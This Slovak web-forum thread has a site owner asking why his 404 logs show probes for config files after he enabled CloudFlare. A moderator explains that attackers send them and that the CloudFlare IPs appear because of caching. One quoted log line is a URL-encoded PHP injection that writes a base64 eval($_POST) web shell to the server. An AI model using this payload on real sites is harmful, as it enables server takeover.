CloudFlare je privelmi "zvedavy"

Sekcia o programovaní, programovacích jazykoch...
Užívateľov profilový obrázok
lepermessiah
Používateľ
Používateľ
Príspevky: 1909
Dátum registrácie: Št 30. Dec, 2010, 02:41
Bydlisko: ZV / BJ

CloudFlare je privelmi "zvedavy"

Príspevok od užívateľa lepermessiah » Ut 02. Aug, 2016, 03:07

Caute,

nestretli ste sa s problemom, ze mate free CDN u CloudFlare a ten vam lozi po stranke a vyslovene sa snazi najst nejaky backdoor ? Sem-tam kontrolujem 404 logy na jednom webe co spravujem a odkedy je tam to CDN (stranka je uzasne rychla) sa objavuju "nenajdene" stranky, napriklad:
  • /configuration.php
    /configbak.php
    /mysql.php
    /load-config.php
    /.joomla.system.php
    /.config.php
    /wp-settings.php
    /webconfig.txt.php
    /.cpanel_config.php
    /administrator?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
..a dalo by sa pokracovat. Web nebezi na ziadnom CMS, cize sa neobavam toho, ze by raz nejaky backdoor nasli, no zaujimalo by ma, preco sa o to snazia a ci sa voci tomu da nejako branit (pri zachovani free CDN)
PS: vsetky nenajdene stranky (resp. subory) su vyhladavane 99% z IPciek CloudFlare ako 173.245.55.71 a 199.27.133.165
Spoiler: ukázať
CPU: Intel Core i5 - 4590
MB: ASUS H97M-Plus
RAM: 2x8GB Crucial Ballistix Elite 1866 CL9 1.5V @ 1600 CL9 CR1
HDD: Samsung 960 Pro 512GB, WD RED 2TB R.1, WD MyBook3 Studio 1.5TB
GPU: GB 7950 3GB OC
Sound: ASUS Xonar Essence ST
PSU: Seasonic X-660
CASE: BitFenix Phenom M
WATER: XSPC EX240 + 2xNoctuaP12, HWLabs Nemesis GTX140 + NoctuaA14PWM, EK Acetal + EN CPU & GPU, ACool VPP655 + EK-D5 X-RES 140
LCD: Dell UltraSharp U2913WM + blink(1) + ambiledHD
Peripherals: Gigaworks T20 r.1, Superlux HD-662B, Logitech G810 + G403 Wireless, MS LifeCam Studio, 1TB mSATA USB-C Samsung 840EVO
+ laptop: Lenovo X1 Yoga 20JE-S0AJ00 + Samsung 840 1TB mSATA / USB-C

Užívateľov profilový obrázok
Chris
Pokročilý používateľ
Pokročilý používateľ
Príspevky: 4630
Dátum registrácie: Pi 13. Jan, 2006, 02:00
Bydlisko: Bratislava
Kontaktovať užívateľa:

Re: CloudFlare je privelmi "zvedavy"

Príspevok od užívateľa Chris » Ut 02. Aug, 2016, 07:38

ja som ho pouzival ale nijako som podla testov nevidel rozdiel tak som zrusil.

Aj kvoli tomu ze tam nefungoval spravne tapatalk s kunenou ak bolo CDN zapnute.

NGINX so spravne nastavenou cache will do the job
Master of PaloAlto NGFWs, Cisco ASAs

Užívateľov profilový obrázok
lepermessiah
Používateľ
Používateľ
Príspevky: 1909
Dátum registrácie: Št 30. Dec, 2010, 02:41
Bydlisko: ZV / BJ

Re: CloudFlare je privelmi "zvedavy"

Príspevok od užívateľa lepermessiah » Ut 02. Aug, 2016, 09:25

tak v tomto pripade si o NGINX mozem len snivat ;)

z testov je to zhruba o 40% rychlejsie, je to staticke, caching v htaccess snad nastaveny dobre, no je tam vela malych obrazkov - 38% obsahu a html tvori 50%, cize chapeme ze to nie je nic velke, no ten CDN tam robi zazraky, preto by som ho nechcel odstavit
Spoiler: ukázať
CPU: Intel Core i5 - 4590
MB: ASUS H97M-Plus
RAM: 2x8GB Crucial Ballistix Elite 1866 CL9 1.5V @ 1600 CL9 CR1
HDD: Samsung 960 Pro 512GB, WD RED 2TB R.1, WD MyBook3 Studio 1.5TB
GPU: GB 7950 3GB OC
Sound: ASUS Xonar Essence ST
PSU: Seasonic X-660
CASE: BitFenix Phenom M
WATER: XSPC EX240 + 2xNoctuaP12, HWLabs Nemesis GTX140 + NoctuaA14PWM, EK Acetal + EN CPU & GPU, ACool VPP655 + EK-D5 X-RES 140
LCD: Dell UltraSharp U2913WM + blink(1) + ambiledHD
Peripherals: Gigaworks T20 r.1, Superlux HD-662B, Logitech G810 + G403 Wireless, MS LifeCam Studio, 1TB mSATA USB-C Samsung 840EVO
+ laptop: Lenovo X1 Yoga 20JE-S0AJ00 + Samsung 840 1TB mSATA / USB-C

Užívateľov profilový obrázok
Chris
Pokročilý používateľ
Pokročilý používateľ
Príspevky: 4630
Dátum registrácie: Pi 13. Jan, 2006, 02:00
Bydlisko: Bratislava
Kontaktovať užívateľa:

Re: CloudFlare je privelmi "zvedavy"

Príspevok od užívateľa Chris » Ut 02. Aug, 2016, 09:50

hod sem porovnanie so zapnutym a vypnutym CDN :)

napr. z

https://gtmetrix.com/
Master of PaloAlto NGFWs, Cisco ASAs

Užívateľov profilový obrázok
lepermessiah
Používateľ
Používateľ
Príspevky: 1909
Dátum registrácie: Št 30. Dec, 2010, 02:41
Bydlisko: ZV / BJ

Re: CloudFlare je privelmi "zvedavy"

Príspevok od užívateľa lepermessiah » Ut 02. Aug, 2016, 10:58

ved prave GTMetrix pouzivam aj ja, od toho sa odrazam, ze to funguje realne (a tiez pocitovo na pocitaci/mobile to loaduje ovela rychlejsie), nacitavanie bolo cca 1.5s a s CDN 1.1s, velkost stranky si nepamatam, nieco okolo 230kb ..
Spoiler: ukázať
CPU: Intel Core i5 - 4590
MB: ASUS H97M-Plus
RAM: 2x8GB Crucial Ballistix Elite 1866 CL9 1.5V @ 1600 CL9 CR1
HDD: Samsung 960 Pro 512GB, WD RED 2TB R.1, WD MyBook3 Studio 1.5TB
GPU: GB 7950 3GB OC
Sound: ASUS Xonar Essence ST
PSU: Seasonic X-660
CASE: BitFenix Phenom M
WATER: XSPC EX240 + 2xNoctuaP12, HWLabs Nemesis GTX140 + NoctuaA14PWM, EK Acetal + EN CPU & GPU, ACool VPP655 + EK-D5 X-RES 140
LCD: Dell UltraSharp U2913WM + blink(1) + ambiledHD
Peripherals: Gigaworks T20 r.1, Superlux HD-662B, Logitech G810 + G403 Wireless, MS LifeCam Studio, 1TB mSATA USB-C Samsung 840EVO
+ laptop: Lenovo X1 Yoga 20JE-S0AJ00 + Samsung 840 1TB mSATA / USB-C

Užívateľov profilový obrázok
shiro
najsilnejší, najkrajší, najmúdrejší BOSS
najsilnejší, najkrajší, najmúdrejší BOSS
Príspevky: 7090
Dátum registrácie: Št 21. Dec, 2006, 02:00
Bydlisko: Banska Bystrica
Kontaktovať užívateľa:

Re: CloudFlare je privelmi "zvedavy"

Príspevok od užívateľa shiro » Ut 02. Aug, 2016, 16:25

Skorej by som riesil podstatu celeho tohoto cirkusu, a sice:
mate free CDN u CloudFlare a ten vam lozi po stranke a vyslovene sa snazi najst nejaky backdoor ?
...co je na tom akoze zle a preco to vobec dakomu vadi?
Obzvlast ked vieme co za ludi bezne weby programuje a kolko dier tam byva? Mali by ste byt este vdacni ze dakto to robi zadara aspon nejako...
Xeon E3-1231v3, 16GB DDR3, Gigabyte Z97-D3H, Samsung 840evo 120GB, Crucial MX300 525GB, 2x WD 1TB, Gainward GTX1060 6GB, Corsair RM550x, 24" BenQ GW2470H
iPad Air 16GB, iPhone SE 32GB

faugusztin
Moderátor
Moderátor
Príspevky: 15354
Dátum registrácie: Ut 26. Feb, 2008, 14:00
Bydlisko: Bratislava/Štúrovo

Re: CloudFlare je privelmi "zvedavy"

Príspevok od užívateľa faugusztin » Ut 02. Aug, 2016, 21:38

S Cloudflare to ma spolocne akurat to, ze si sa stal "zaujimavym cielom" v momente ked si presiel pod Cloudflare. Samo o sebe tie query oni nerobia. A kedze cloudflare cachuje tvoje stranky, tak VZDY budes mat IP v logoch z adries CF.

Užívateľov profilový obrázok
lepermessiah
Používateľ
Používateľ
Príspevky: 1909
Dátum registrácie: Št 30. Dec, 2010, 02:41
Bydlisko: ZV / BJ

Re: CloudFlare je privelmi "zvedavy"

Príspevok od užívateľa lepermessiah » St 03. Aug, 2016, 17:34

aha, takto som sa na to nepozeral :D diki faugusztin

@shiro no vadi to mne, lebo za tyzden to spravi 12MB log a hosting ma len 50MB :D a vypnut by som to nerad, kedze to obcas aj pomoze s identifikovanim problemu ako stratene obrazky a tak ..
Spoiler: ukázať
CPU: Intel Core i5 - 4590
MB: ASUS H97M-Plus
RAM: 2x8GB Crucial Ballistix Elite 1866 CL9 1.5V @ 1600 CL9 CR1
HDD: Samsung 960 Pro 512GB, WD RED 2TB R.1, WD MyBook3 Studio 1.5TB
GPU: GB 7950 3GB OC
Sound: ASUS Xonar Essence ST
PSU: Seasonic X-660
CASE: BitFenix Phenom M
WATER: XSPC EX240 + 2xNoctuaP12, HWLabs Nemesis GTX140 + NoctuaA14PWM, EK Acetal + EN CPU & GPU, ACool VPP655 + EK-D5 X-RES 140
LCD: Dell UltraSharp U2913WM + blink(1) + ambiledHD
Peripherals: Gigaworks T20 r.1, Superlux HD-662B, Logitech G810 + G403 Wireless, MS LifeCam Studio, 1TB mSATA USB-C Samsung 840EVO
+ laptop: Lenovo X1 Yoga 20JE-S0AJ00 + Samsung 840 1TB mSATA / USB-C

Napísať odpoveď

Návrat na "Programovanie"